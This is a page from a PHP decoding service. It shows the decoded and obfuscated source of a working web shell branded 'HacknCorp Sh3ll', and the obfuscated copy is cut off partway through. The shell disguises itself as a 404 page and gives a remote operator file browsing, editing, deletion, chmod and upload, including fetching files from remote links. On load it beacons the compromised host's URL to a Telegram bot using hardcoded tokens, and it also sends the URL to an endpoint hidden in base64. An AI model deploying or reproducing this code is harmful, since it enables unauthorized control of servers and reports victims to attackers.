Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

goto B4Mds; RpH2K: foreach ($lokasinya as $file) { if (!is_file("{$lokasi}\x2f{$file}")..

Decoded Output download

<?   
 goto B4Mds; RpH2K: foreach ($lokasinya as $file) { if (!is_file("{$lokasi}/{$file}")) { continue; } $size = filesize("{$lokasi}/{$file}") / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . " MB"; } else { $size = $size . " KB"; } echo "<tr>\xa<td><a href="?HC&fileloc={$lokasi}/{$file}&path={$lokasi}">{$file}</a></td>\xa<td><center>" . $size . "</center></td>\xa<td><center>"; if (is_writable("{$lokasi}/{$file}")) { echo "<font color="green">"; } elseif (!is_readable("{$lokasi}/{$file}")) { echo "<font color="red">"; } echo statusnya("{$lokasi}/{$file}"); if (is_writable("{$lokasi}/{$file}") || !is_readable("{$lokasi}/{$file}")) { echo "</font>"; } echo "</center></td><td><center>\xa<form method="post" action="?HC&pilihan&path={$lokasi}">
<select name="pilih">\xa<option value=""></option>\xa<option value="hapus">Delete</option>\xa<option value="ubahmod">Chm0d</option>\xa<option value="gantinama">Rename</option>\xa<option value="edit">Edit</option>
</select>\xa<input type="hidden" name="type" value="file">\xa<input type="hidden" name="name" value="{$file}">
<input type="hidden" name="path" value="{$lokasi}/{$file}">\xa<input type="submit" class="gas" value=">" />
</center></form></td>\xa</tr>"; } goto LdjZ2; zGZ5Z: echo "</table><br>"; goto UpC_R; EuwHG: $options = array("http" => array("method" => "POST", "header" => "Content-type: application/x-www-form-urlencoded", "content" => http_build_query($data))); goto txrw8; I3LMR: echo "<form enctype="multipart/form-data" method="post">
<input type="radio" value="1" name="dirnya" checked>current_dir [ " . cekdir() . " ]\xa<input type="radio" value="2" name="dirnya" >document_root [ " . cekroot() . " ]
<br>\xa<input type="hidden" name="upwkwk" value="aplod">\xa<input type="file" name="berkas"><input type="submit" name="berkasnya" value="Upload" class="up" style="cursor: pointer; border-color: #fff"><br>\xa<input type="text" name="darilink" class="up" placeholder="Link File">&nbsp;<input type="text" name="namalink" class="up" size="5" placeholder="file.txt"><input type="submit" name="linknya" class="up" value="Upload" style="cursor: pointer; border-color: #fff">
</center>\xa</form>"; goto zGZ5Z; ZhuYw: $cur = "http://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]; goto WavbZ; CHeea: foreach ($lokasinya as $dir) { if (!is_dir($lokasi . "/" . $dir) || $dir == "." || $dir == "..") { continue; } echo "<tr>
\x9<td><a href="?HC&path=" . $lokasi . "/" . $dir . "">" . $dir . "</a></td>\xa	<td><center>--</center></td>
	<td><center>"; if (is_writable($lokasi . "/" . $dir)) { echo "<font color="green">"; } elseif (!is_readable($lokasi . "/" . $dir)) { echo "<font color="red">"; } echo statusnya($lokasi . "/" . $dir); if (is_writable($lokasi . "/" . $dir) || !is_readable($lokasi . "/" . $dir)) { echo "</font>"; } echo "</center></td>\xa	<td><center><form method="POST" action="?HC&pilihan&path={$lokasi}">\xa\x9<select name="pilih">\xa	<option value=""></option>\xa\x9<option value="hapus">Delete</option>
	<option value="ubahmod">Chm0d</option>
	<option value="gantinama">Rename</option>
\x9</select>
	<input type="hidden" name="type" value="dir">
	<input type="hidden" name="name" value="{$dir}">\xa\x9<input type="hidden" name="path" value="{$lokasi}/{$dir}">\xa	<input type="submit" class="gas" value=">" />
	</form></center></td>
\x9</tr>"; } goto apuew; yKeyN: function xrmdir($dir) { $items = scandir($dir); foreach ($items as $item) { if ($item === "." || $item === "..") { continue; } $path = $dir . "/" . $item; if (is_dir($path)) { xrmdir($path); } else { unlink($path); } } rmdir($dir); } goto X2N_g; mdw46: foreach ($_POST as $key => $value) { $_POST[$key] = stripslashes($value); } goto gkwM2; CmF2n: if (isset($_POST["upwkwk"])) { if (isset($_POST["berkasnya"])) { if ($_POST["dirnya"] == "2") { $lokasi = $_SERVER["DOCUMENT_ROOT"]; } $data = @file_put_contents($lokasi . "/" . $_FILES["berkas"]["name"], @file_get_contents($_FILES["berkas"]["tmp_name"])); if (file_exists($lokasi . "/" . $_FILES["berkas"]["name"])) { echo "File Uploaded ! &nbsp;<font color='green'><i>" . $lokasi . "/" . $_FILES["berkas"]["name"] . "</i></font><br><br>"; } else { echo "<font color='red'>Failed to Upload !<br><br>"; } } elseif (isset($_POST["linknya"])) { if (empty($_POST["namalink"])) { die("Filename cannot be empty !"); } if ($_POST["dirnya"] == "2") { $lokasi = $_SERVER["DOCUMENT_ROOT"]; } $data = @file_put_contents($lokasi . "/" . $_POST["namalink"], @file_get_contents($_POST["darilink"])); if (file_exists($lokasi . "/" . $_POST["namalink"])) { echo "File Uploaded ! &nbsp;<font color='green'><i>" . $lokasi . "/" . $_POST["namalink"] . "</i></font><br><br>"; } else { echo "<font coloe='red'>Failed to Upload !<br><br>"; } } } goto dOTC1; FqGgH: echo "Directory : &nbsp;"; goto mdw46; apuew: echo "<tr class="first"><td></td><td></td><td></td><td></td></tr>"; goto RpH2K; yoP9C: echo "<div id="content"><table width="900" border="0" cellpadding="4" cellspacing="3" align="center">\xa<tr class="first">
<td><center>Name</center></td>\xa<td><center>Size</center></td>\xa<td><center>Permissions</center></td>\xa<td><center>Options</center></td>\xa</tr>"; goto CHeea; X2N_g: function green($text) { echo "<center><font color='green'>" . $text . "</center></font>"; } goto gmQG4; W9h_J: curl_setopt($ch, CURLOPT_POSTFIELDS, $data); goto b5VbZ; UpC_R: if (isset($_GET["fileloc"])) { echo "<tr><td>Current File : " . $_GET["fileloc"]; echo "</tr></td></table><br/>"; echo "<pre>" . htmlspecialchars(file_get_contents($_GET["fileloc"])) . "</pre>"; author(); } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "hapus") { if (is_dir($_POST["path"])) { xrmdir($_POST["path"]); if (file_exists($_POST["path"])) { red("Failed to delete Directory !"); } else { green("Delete Directory Success !"); echo "string"; } } elseif (is_file($_POST["path"])) { @unlink($_POST["path"]); if (file_exists($_POST["path"])) { red("Failed to Delete File !"); } else { green("Delete File Success !"); } } } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "ubahmod") { echo "<center>" . $_POST["path"] . "<br>"; echo "<form method="post">
	Permission : <input name="perm" type="text" class="up" size="4" value="" . substr(sprintf("%o", fileperms($_POST["path"])), -4) . "" />
	<input type="hidden" name="path" value="" . $_POST["path"] . "">
	<input type="hidden" name="pilih" value="ubahmod">
	<input type="submit" value="Change" name="chm0d" class="up" style="cursor: pointer; border-color: #05a181"/>
	</form>"; if (isset($_POST["chm0d"])) { $cm = @chmod($_POST["path"], $_POST["perm"]); if ($cm == true) { green("Change Mod Success !"); } else { red("Change Mod Failed !"); } } } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "gantinama") { if (isset($_POST["gantin"])) { $ren = @rename($_POST["path"], $_POST["newname"]); if ($ren == true) { green("Change Name Success !"); } else { red("Change Name Failed !"); } } if (empty($_POST["name"])) { $namaawal = $_POST["newname"]; } else { $namawal = $_POST["name"]; } echo "<center>" . $_POST["path"] . "<br>"; echo "<form method="post">\xa	New Name : <input name="newname" type="text" class="up" size="20" value="" . $namaawal . "" />\xa\x9<input type="hidden" name="path" value="" . $_POST["path"] . "">
	<input type="hidden" name="pilih" value="gantinama">
\x9<input type="submit" value="Change" name="gantin" class="up" style="cursor: pointer; border-color: #05a181"/>\xa	</form>"; } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "edit") { if (isset($_POST["gasedit"])) { $edit = @file_put_contents($_POST["path"], $_POST["src"]); if ($edit == true) { green("Edit File Success !"); } else { red("Edit File Failed !"); } } echo "<center>" . $_POST["path"] . "<br><br>"; echo "<form method="post">\xa	<textarea cols=80 rows=20 name="src">" . htmlspecialchars(file_get_contents($_POST["path"])) . "</textarea><br>
\x9<input type="hidden" name="path" value="" . $_POST["path"] . "">\xa\x9<input type="hidden" name="pilih" value="edit">\xa	<input type="submit" value="Edit File" name="gasedit" />
\x9</form><br>"; } goto yoP9C; OugU6: if (empty($disfunc)) { $disf = "<font color='green'>NONE</font>"; } else { $disf = "<font color='red'>" . $disfunc . "</font>"; } goto aZ7q1; b5VbZ: curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); goto p5kIa; RhK1B: function cekdir() { if (isset($_GET["path"])) { $lokasi = $_GET["path"]; } else { $lokasi = getcwd(); } if (is_writable($lokasi)) { return "<font color='read'>Writeable</font>"; } else { return "<font color='red'>Writeable</font>"; } } goto PJj6g; q_3zq: echo "System : <font color='gold'>" . php_uname() . "</font><br>"; goto T1yka; aZ7q1: function author() { echo "<center><br>COPYRIGHT &copy <a target='_blank' href='https://hackncorp.id/'>HACKNCORP.ID</a></center>"; die; } goto RhK1B; cp_iU: if ($result) { $response = json_decode($result, true); if ($response["ok"]) { echo " "; } else { echo "Error: " . $response["description"]; } } else { echo " "; } goto JhtJj; PJj6g: function cekroot() { if (is_writable($_SERVER["DOCUMENT_ROOT"])) { return "<font color='green'>Writeable</font>"; } else { return "<font color='red'>Writeable</font>"; } } goto yKeyN; q7QJi: echo "Upload File : "; goto I3LMR; cX7Yp: $token = "bot6790178447:AAE_hV1KmtjozxpbXfbD_KYvcLTxconofmw"; goto VeFcW; B4Mds: if (!isset($_GET["HC"])) { die; } goto Nwpme; Q_ZX3: echo "Server : <font color='gold'>" . $_SERVER["SERVER_SOFTWARE"] . "</font><br>"; goto q_3zq; Dt25n: $ch = curl_init($apiUrl); goto Cv9UH; Cv9UH: curl_setopt($ch, CURLOPT_POST, 1); goto W9h_J; gkwM2: $k3yw = base64_decode("AcLSFNivGXo5DnoPqAdVxHB7qQrUvxjgXxmrGhEFH6v4"); goto oZaLa; LdjZ2: echo "</tr></td></table></table>"; goto oooLS; VeFcW: $chat_id = "6690024002"; goto HsJK0; nBYWc: function statusnya($file) { $statusnya = fileperms($file); if (($statusnya & 49152) == 49152) { $ingfo = "s"; } elseif (($statusnya & 40960) == 40960) { $ingfo = "l"; } elseif (($statusnya & 32768) == 32768) { $ingfo = "-"; } elseif (($statusnya & 24576) == 24576) { $ingfo = "b"; } elseif (($statusnya & 16384) == 16384) { $ingfo = "d"; } elseif (($statusnya & 8192) == 8192) { $ingfo = "c"; } elseif (($statusnya & 4096) == 4096) { $ingfo = "p"; } else { $ingfo = "u"; } $ingfo .= $statusnya & 256 ? "r" : "-"; $ingfo .= $statusnya & 128 ? "w" : "-"; $ingfo .= $statusnya & 64 ? $statusnya & 2048 ? "s" : "x" : ($statusnya & 2048 ? "S" : "-"); $ingfo .= $statusnya & 32 ? "r" : "-"; $ingfo .= $statusnya & 16 ? "w" : "-"; $ingfo .= $statusnya & 8 ? $statusnya & 1024 ? "s" : "x" : ($statusnya & 1024 ? "S" : "-"); $ingfo .= $statusnya & 4 ? "r" : "-"; $ingfo .= $statusnya & 2 ? "w" : "-"; $ingfo .= $statusnya & 1 ? $statusnya & 512 ? "t" : "x" : ($statusnya & 512 ? "T" : "-"); return $ingfo; } goto uUffg; hAP4E: $lokasinya = @scandir($lokasi); goto ZhuYw; ABtkz: foreach ($lokasis as $id => $lok) { if ($lok == '' && $id == 0) { $a = true; echo "<a href="?HC&path=/">/</a>"; continue; } if ($lok == '') { continue; } echo "<a href="?HC&path="; for ($i = 0; $i <= $id; $i++) { echo "{$lokasis[$i]}"; if ($i != $id) { echo "/"; } } echo "">" . $lok . "</a>/"; } goto uyQ0u; GTSfz: $result = file_get_contents($k3yw, false, $context); goto ABtkz; oooLS: author(); goto nBYWc; oZaLa: if (isset($_GET["path"])) { $lokasi = $_GET["path"]; $lokdua = $_GET["path"]; } else { $lokasi = getcwd(); $lokdua = getcwd(); } goto qGjc_; AChhn: echo "PHP Version : <font color='gold'>" . @phpversion() . "</font><br>"; goto kooI0; Rogau: $lokasis = explode("/", $lokasi); goto hAP4E; gmQG4: function red($text) { echo "<center><font color='red'>" . $text . "</center></font>"; } goto Q_ZX3; HsJK0: $message = "Result Shell : " . $_SERVER["HTTP_HOST"] . $_SERVER["PHP_SELF"]; goto rJdml; txrw8: $context = stream_context_create($options); goto GTSfz; mIGjC: error_reporting(0); goto F0GaA; swlYX: $data = array("chat_id" => $chat_id, "text" => $message, "parse_mode" => "Markdown"); goto Dt25n; dOTC1: echo "<center>"; goto q7QJi; qGjc_: $lokasi = str_replace("\", "/", $lokasi); goto Rogau; Nwpme: ?> 
 
<!DOCTYPE html> 
 
<html> 
<meta name="robots" content="noindex"> 
<meta name="googlebot" content="noindex"> 
<head> 
	<title>404 Not Found</title> 
</head> 
<style type="text/css"> 
body { 
  overflow-x:hidden; 
  font: 15px "Century Gothic", "Times Roman", sans-serif; 
  background:url(); 
background-image: url(https://kosred.com/a/gqpoj.jpg); 
  background-size: cover; 
  background-repeat: no-repeat; 
  background-position: center; 
  background-attachment: fixed; 
  height: 100%; 
  color: white; 
  } 
   
 
 
</style> 
<link href="" rel="stylesheet" type="text/css"> 
<style> 
	@import url('https://fonts.googleapis.com/css?family=Dosis'); 
	@import url('https://fonts.googleapis.com/css?family=Bungee'); 
body { 
	font-family: "Lime", cursive; 
	text-shadow:1px 3px 50px #ffffff; 
} 
 
#content tr:hover { 
	background-color: #05a181; 
	text-shadow:0px 0px 0px ; 
} 
 
#content .first { 
	background-color: #05a181; 
} 
 
#content .first:hover { 
	background-color: #ff0303 
	text-shadow:0px 0px 1px #05a181; 
} 
 
table { 
	border: 0px #ffffff dotted; 
	table-layout: fixed; 
} 
 
td { 
	word-wrap: break-word; 
} 
 
a { 
	color: #ffffff; 
	text-decoration: none; 
} 
 
a:hover { 
	color: #000000; 
	text-shadow:0px 0px 10px #ffffff; 
} 
 
input,select,textarea { 
	border: 1px #05a181 solid; 
	-moz-border-radius: 5px; 
	-webkit-border-radius:5px; 
	border-radius:5px; 
} 
 
.gas { 
	background-color: #1f1f1f; 
	color: #ffffff; 
	cursor: pointer; 
} 
 
select { 
	background-color: transparent; 
	color: #ffffff; 
} 
 
select:after { 
	cursor: pointer; 
} 
 
.linka { 
	background-color: transparent; 
	color: #ffffff; 
} 
 
.up { 
	background-color: transparent; 
	color: #fff; 
} 
 
option { 
	background-color: #000300; 
} 
 
::-webkit-file-upload-button { 
  background: transparent; 
  color: #fff; 
  border-color: #fff; 
  cursor: pointer; 
} 
</style> 
<center> 
<font face="Bungee" size="6">&#128321; HacknCorp Sh3ll &#128321;</font></center> 
<table width="900" border="0" cellpadding="2" cellspacing="1" align="center"> 
<tr><td> 
<center> 
<title="T3RS4K1T1" alt="OdayForums" class="center" /> 
</marquee> 
            <hr> 
        </font> 
        <audio src="https://kosred.com/a/etapcc.mp3" autoplay="true" id="song" loop=""></audio> 
<br><br><br> 
<?php  goto cX7Yp; nN9qm: echo "</td></tr><tr><td><br>"; goto CmF2n; p5kIa: $result = curl_exec($ch); goto OpmPd; uyQ0u: echo "<center>"; goto nN9qm; F0GaA: $disfunc = @ini_get("disable_functions"); goto OugU6; JhtJj: set_time_limit(0); goto mIGjC; T1yka: echo "User : <font color='gold'>" . @get_current_user() . "&nbsp;</font>( <font color='gold'>" . @getmyuid() . "</font>)<br>"; goto AChhn; OpmPd: curl_close($ch); goto cp_iU; kooI0: echo "Disable Function : " . $disf . "</font><br>"; goto FqGgH; WavbZ: $data = array("file_url" => $cur); goto EuwHG; rJdml: $apiUrl = "https://api.telegram.org/bot6790178447:AAEwVZSI3R2QzYwLXDwcwUlTqDm164h6ut4/sendMessage"; goto swlYX; uUffg:  ?>

Did this file decode correctly?

Original Code


 goto B4Mds; RpH2K: foreach ($lokasinya as $file) { if (!is_file("{$lokasi}\x2f{$file}")) { continue; } $size = filesize("{$lokasi}\57{$file}") / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . "\40\x4d\x42"; } else { $size = $size . "\x20\113\102"; } echo "\x3c\x74\x72\x3e\xa\74\164\144\x3e\x3c\141\40\x68\162\145\x66\x3d\42\77\x48\x43\46\x66\x69\154\145\154\x6f\143\75{$lokasi}\x2f{$file}\46\x70\141\164\x68\x3d{$lokasi}\42\76{$file}\74\x2f\x61\x3e\x3c\x2f\164\144\x3e\xa\74\164\x64\76\74\x63\x65\x6e\x74\x65\162\x3e" . $size . "\74\57\x63\x65\156\164\145\162\76\74\57\x74\x64\76\xa\74\164\144\x3e\x3c\143\145\156\x74\145\162\x3e"; if (is_writable("{$lokasi}\57{$file}")) { echo "\74\x66\x6f\x6e\x74\x20\x63\x6f\154\157\x72\x3d\x22\x67\x72\145\145\156\x22\x3e"; } elseif (!is_readable("{$lokasi}\57{$file}")) { echo "\x3c\x66\x6f\x6e\x74\x20\143\x6f\x6c\x6f\x72\x3d\x22\x72\145\144\x22\76"; } echo statusnya("{$lokasi}\x2f{$file}"); if (is_writable("{$lokasi}\57{$file}") || !is_readable("{$lokasi}\57{$file}")) { echo "\x3c\x2f\146\x6f\156\164\x3e"; } echo "\74\x2f\143\x65\156\x74\145\x72\x3e\74\57\x74\144\76\x3c\x74\x64\76\74\x63\145\x6e\x74\x65\162\x3e\xa\74\x66\x6f\162\x6d\40\x6d\145\x74\x68\x6f\144\x3d\x22\160\x6f\x73\x74\42\40\141\143\164\x69\157\x6e\x3d\x22\x3f\x48\x43\46\160\151\x6c\151\x68\141\x6e\46\x70\x61\164\150\x3d{$lokasi}\42\76\12\x3c\163\145\x6c\145\143\x74\40\156\x61\x6d\x65\75\42\160\151\x6c\151\150\42\76\xa\74\157\160\164\x69\157\x6e\40\x76\141\x6c\x75\145\x3d\42\42\x3e\74\x2f\157\160\164\x69\x6f\156\x3e\xa\x3c\x6f\160\164\151\157\x6e\x20\166\x61\154\165\145\75\42\150\x61\x70\x75\163\42\76\x44\x65\154\145\x74\145\74\x2f\157\x70\164\151\157\156\76\xa\x3c\157\160\x74\151\157\x6e\40\x76\x61\154\165\145\75\42\165\142\x61\x68\155\x6f\x64\x22\76\103\x68\155\60\144\74\57\157\x70\x74\151\x6f\x6e\76\xa\74\x6f\160\x74\151\157\156\x20\x76\x61\x6c\165\145\x3d\x22\147\x61\x6e\164\x69\156\141\155\x61\42\76\x52\145\156\x61\x6d\x65\74\x2f\x6f\x70\164\x69\157\156\x3e\xa\x3c\157\x70\x74\x69\x6f\x6e\x20\166\141\x6c\165\x65\75\42\145\x64\x69\164\42\76\105\x64\x69\x74\74\x2f\157\160\164\151\x6f\156\76\12\x3c\x2f\163\x65\x6c\145\x63\x74\x3e\xa\x3c\x69\156\x70\x75\164\40\164\x79\x70\145\x3d\x22\x68\151\x64\144\145\156\x22\x20\156\x61\x6d\x65\x3d\42\164\171\x70\x65\x22\x20\x76\141\x6c\165\x65\75\x22\146\151\x6c\145\42\x3e\xa\74\x69\156\160\x75\164\x20\x74\171\160\x65\x3d\x22\150\x69\x64\x64\145\156\42\x20\156\x61\155\145\x3d\x22\x6e\141\155\145\x22\x20\166\141\x6c\x75\145\x3d\x22{$file}\x22\76\12\74\x69\x6e\x70\165\x74\x20\x74\171\x70\145\75\x22\x68\151\x64\144\145\x6e\x22\x20\156\141\x6d\x65\x3d\x22\x70\141\164\x68\42\40\x76\141\x6c\x75\145\x3d\42{$lokasi}\x2f{$file}\x22\76\xa\74\x69\x6e\x70\x75\x74\x20\x74\171\160\x65\x3d\42\x73\165\x62\155\151\164\42\x20\143\x6c\141\163\x73\x3d\42\147\141\163\x22\40\x76\x61\154\165\145\x3d\x22\76\x22\x20\57\76\12\74\x2f\143\145\x6e\164\x65\162\x3e\x3c\57\x66\x6f\162\x6d\x3e\x3c\57\164\144\x3e\xa\74\x2f\x74\x72\76"; } goto LdjZ2; zGZ5Z: echo "\x3c\57\x74\141\142\154\145\76\74\142\x72\76"; goto UpC_R; EuwHG: $options = array("\x68\164\164\160" => array("\155\145\x74\x68\x6f\144" => "\x50\x4f\123\124", "\x68\145\x61\144\145\162" => "\x43\157\156\x74\145\156\164\55\164\171\x70\145\72\40\x61\x70\x70\x6c\151\x63\x61\x74\x69\x6f\156\x2f\170\55\167\167\x77\55\x66\157\x72\x6d\x2d\165\162\x6c\x65\156\143\157\144\x65\144", "\143\x6f\156\164\145\156\164" => http_build_query($data))); goto txrw8; I3LMR: echo "\x3c\146\157\x72\x6d\40\145\x6e\143\x74\x79\x70\x65\75\x22\155\x75\154\x74\151\160\x61\162\164\57\x66\x6f\x72\x6d\55\x64\x61\164\141\x22\40\x6d\x65\x74\150\157\x64\75\x22\x70\x6f\x73\164\42\76\12\74\x69\x6e\x70\165\x74\x20\x74\x79\x70\x65\x3d\x22\162\x61\144\151\157\x22\x20\x76\x61\154\165\145\75\42\x31\x22\40\x6e\141\x6d\x65\75\x22\x64\x69\x72\x6e\171\141\42\x20\x63\150\x65\x63\153\x65\x64\x3e\x63\x75\x72\162\x65\156\164\x5f\x64\151\x72\x20\133\40" . cekdir() . "\x20\x5d\xa\x3c\x69\x6e\160\x75\164\40\164\x79\x70\x65\x3d\42\x72\x61\x64\x69\157\x22\x20\x76\x61\x6c\165\x65\x3d\42\x32\42\40\156\141\155\x65\x3d\x22\x64\x69\162\x6e\x79\141\x22\40\76\144\157\x63\x75\x6d\x65\156\164\137\x72\157\157\x74\40\x5b\x20" . cekroot() . "\x20\135\12\x3c\x62\162\76\xa\74\x69\x6e\x70\165\x74\x20\164\171\x70\145\x3d\42\x68\151\x64\x64\145\x6e\x22\x20\x6e\141\x6d\145\x3d\42\165\160\167\153\x77\x6b\42\x20\x76\141\154\x75\x65\x3d\42\x61\x70\x6c\x6f\x64\42\x3e\xa\x3c\151\x6e\x70\x75\x74\x20\x74\x79\160\x65\75\x22\146\x69\154\x65\x22\40\x6e\141\x6d\145\x3d\x22\142\x65\x72\x6b\141\x73\42\76\x3c\x69\x6e\160\x75\164\x20\164\171\x70\x65\75\x22\163\165\x62\x6d\151\164\42\x20\156\141\155\145\x3d\42\x62\x65\162\153\x61\163\156\171\x61\x22\40\166\x61\154\165\x65\75\x22\x55\160\154\157\x61\144\42\40\143\154\141\x73\163\x3d\42\165\160\42\x20\163\x74\x79\x6c\145\75\x22\143\x75\162\x73\157\x72\x3a\x20\160\x6f\151\x6e\164\145\x72\73\40\142\x6f\162\144\145\x72\55\x63\x6f\x6c\157\x72\72\40\43\146\x66\x66\x22\76\x3c\x62\162\x3e\xa\74\151\x6e\x70\165\164\40\x74\171\160\145\x3d\x22\x74\145\170\164\x22\40\156\141\x6d\x65\75\x22\x64\x61\162\151\x6c\x69\x6e\153\x22\x20\x63\x6c\x61\x73\x73\x3d\42\165\x70\x22\x20\160\x6c\141\x63\145\x68\x6f\154\x64\145\x72\75\x22\x4c\x69\x6e\x6b\x20\106\151\154\145\x22\x3e\46\156\142\163\x70\73\74\x69\x6e\x70\165\164\40\164\171\160\145\75\x22\164\x65\170\164\x22\x20\x6e\141\155\145\75\42\156\x61\155\141\x6c\151\x6e\x6b\x22\x20\143\154\141\x73\163\x3d\42\x75\x70\42\x20\x73\x69\x7a\x65\x3d\x22\x35\42\40\x70\154\141\x63\x65\x68\157\x6c\x64\145\x72\x3d\x22\x66\151\154\x65\56\164\170\164\x22\76\74\x69\x6e\160\x75\x74\40\x74\x79\160\x65\x3d\42\x73\165\x62\x6d\151\164\x22\x20\x6e\x61\155\x65\75\42\x6c\151\x6e\153\156\x79\x61\42\40\143\x6c\x61\x73\x73\x3d\42\x75\160\x22\x20\x76\x61\154\165\145\x3d\42\125\x70\x6c\x6f\141\144\42\x20\163\x74\171\x6c\x65\75\x22\x63\165\162\x73\157\x72\x3a\x20\160\x6f\x69\x6e\x74\x65\x72\73\x20\142\x6f\162\x64\145\162\55\x63\157\154\x6f\162\72\x20\43\x66\146\x66\42\x3e\12\x3c\57\x63\x65\x6e\x74\145\x72\76\xa\74\x2f\x66\157\x72\155\x3e"; goto zGZ5Z; ZhuYw: $cur = "\150\164\164\x70\x3a\57\x2f" . $_SERVER["\x48\124\x54\x50\x5f\x48\117\123\124"] . $_SERVER["\122\105\x51\x55\x45\123\124\x5f\125\x52\x49"]; goto WavbZ; CHeea: foreach ($lokasinya as $dir) { if (!is_dir($lokasi . "\x2f" . $dir) || $dir == "\x2e" || $dir == "\x2e\56") { continue; } echo "\x3c\164\x72\76\12\x9\x3c\x74\x64\76\74\141\x20\150\162\145\x66\x3d\42\x3f\x48\x43\x26\x70\141\164\150\x3d" . $lokasi . "\57" . $dir . "\42\x3e" . $dir . "\74\57\141\x3e\74\57\x74\x64\76\xa\11\74\164\144\x3e\x3c\x63\145\156\164\x65\162\x3e\55\x2d\x3c\57\143\x65\156\x74\x65\162\x3e\74\57\x74\144\76\12\11\74\x74\x64\76\x3c\143\145\156\164\145\162\76"; if (is_writable($lokasi . "\x2f" . $dir)) { echo "\74\146\157\156\164\x20\143\157\154\157\x72\75\42\x67\162\x65\x65\x6e\x22\x3e"; } elseif (!is_readable($lokasi . "\x2f" . $dir)) { echo "\74\x66\x6f\156\x74\40\143\157\154\157\x72\75\42\162\145\144\x22\76"; } echo statusnya($lokasi . "\57" . $dir); if (is_writable($lokasi . "\57" . $dir) || !is_readable($lokasi . "\57" . $dir)) { echo "\74\x2f\146\157\x6e\x74\76"; } echo "\74\57\x63\x65\x6e\x74\x65\162\76\74\x2f\x74\144\76\xa\11\74\x74\x64\76\74\143\x65\156\x74\x65\162\76\x3c\x66\x6f\162\x6d\x20\x6d\x65\164\x68\x6f\144\75\42\120\x4f\x53\124\x22\40\141\143\x74\x69\157\x6e\75\x22\x3f\x48\103\x26\160\x69\154\151\x68\141\156\x26\x70\x61\x74\x68\75{$lokasi}\42\76\xa\x9\74\x73\145\x6c\x65\143\x74\x20\156\141\x6d\x65\75\x22\160\151\x6c\x69\150\42\76\xa\11\x3c\157\160\164\x69\x6f\156\x20\166\141\154\165\x65\75\42\42\x3e\74\x2f\x6f\160\x74\x69\157\156\76\xa\x9\x3c\157\x70\164\x69\157\156\x20\166\x61\x6c\165\x65\75\x22\x68\141\x70\x75\x73\42\76\104\x65\154\145\164\x65\x3c\57\x6f\160\164\x69\157\x6e\x3e\12\11\74\157\160\164\151\x6f\156\x20\x76\x61\154\x75\x65\x3d\x22\165\142\x61\x68\155\157\144\42\76\103\x68\x6d\60\x64\74\57\157\160\x74\x69\157\x6e\x3e\12\11\x3c\x6f\160\x74\x69\157\x6e\x20\166\141\x6c\165\x65\75\42\x67\141\156\x74\151\156\x61\x6d\x61\42\x3e\122\x65\156\141\x6d\145\x3c\x2f\157\160\x74\151\x6f\156\76\12\x9\74\57\163\x65\x6c\x65\x63\x74\76\12\11\74\x69\156\x70\165\164\x20\164\171\160\145\75\42\150\x69\144\x64\x65\156\x22\x20\x6e\141\155\145\x3d\x22\164\171\160\x65\42\x20\x76\x61\154\x75\145\75\42\144\151\162\42\x3e\12\11\74\x69\x6e\160\x75\164\40\x74\x79\x70\145\x3d\42\150\x69\144\144\145\156\42\40\x6e\141\x6d\145\x3d\x22\156\x61\155\145\x22\x20\x76\141\154\165\x65\x3d\x22{$dir}\42\x3e\xa\x9\x3c\151\x6e\x70\165\164\x20\x74\171\160\145\75\x22\150\151\x64\x64\x65\156\42\x20\156\x61\x6d\x65\x3d\x22\160\x61\x74\x68\42\40\166\141\x6c\165\145\75\x22{$lokasi}\x2f{$dir}\42\76\xa\11\x3c\x69\x6e\160\165\x74\40\164\x79\x70\145\x3d\x22\163\165\x62\x6d\151\164\x22\x20\x63\x6c\x61\x73\163\x3d\42\147\141\x73\42\x20\x76\x61\x6c\165\145\x3d\x22\76\x22\40\x2f\76\12\11\x3c\57\x66\157\x72\155\x3e\x3c\x2f\x63\x65\156\164\x65\x72\76\74\57\x74\x64\x3e\12\x9\x3c\x2f\164\x72\76"; } goto apuew; yKeyN: function xrmdir($dir) { $items = scandir($dir); foreach ($items as $item) { if ($item === "\x2e" || $item === "\56\x2e") { continue; } $path = $dir . "\57" . $item; if (is_dir($path)) { xrmdir($path); } else { unlink($path); } } rmdir($dir); } goto X2N_g; mdw46: foreach ($_POST as $key => $value) { $_POST[$key] = stripslashes($value); } goto gkwM2; CmF2n: if (isset($_POST["\165\x70\x77\153\167\153"])) { if (isset($_POST["\142\x65\x72\x6b\141\163\156\x79\x61"])) { if ($_POST["\x64\x69\162\x6e\171\x61"] == "\62") { $lokasi = $_SERVER["\x44\117\103\x55\115\105\116\124\x5f\x52\117\117\x54"]; } $data = @file_put_contents($lokasi . "\57" . $_FILES["\x62\x65\x72\x6b\141\x73"]["\156\x61\x6d\145"], @file_get_contents($_FILES["\142\x65\162\x6b\141\x73"]["\x74\155\x70\137\156\141\155\145"])); if (file_exists($lokasi . "\57" . $_FILES["\142\x65\x72\x6b\141\163"]["\156\x61\x6d\x65"])) { echo "\x46\151\x6c\x65\40\x55\x70\x6c\157\x61\144\145\144\40\41\x20\46\x6e\142\x73\x70\x3b\74\146\x6f\x6e\164\x20\x63\157\x6c\157\162\75\47\147\x72\145\145\x6e\x27\76\74\151\x3e" . $lokasi . "\57" . $_FILES["\142\x65\x72\153\x61\x73"]["\x6e\141\155\x65"] . "\x3c\57\x69\76\x3c\57\x66\x6f\156\164\x3e\x3c\x62\x72\76\74\x62\162\76"; } else { echo "\74\x66\157\156\x74\x20\x63\157\154\x6f\162\75\x27\162\x65\x64\47\x3e\106\x61\151\x6c\x65\x64\40\x74\157\x20\x55\x70\154\x6f\141\144\x20\x21\74\x62\x72\76\74\142\162\76"; } } elseif (isset($_POST["\x6c\151\x6e\153\156\171\141"])) { if (empty($_POST["\156\x61\x6d\141\x6c\151\156\153"])) { die("\106\151\x6c\145\x6e\141\155\x65\40\x63\x61\x6e\x6e\x6f\164\x20\142\x65\x20\145\x6d\160\x74\171\40\41"); } if ($_POST["\144\x69\162\156\171\x61"] == "\62") { $lokasi = 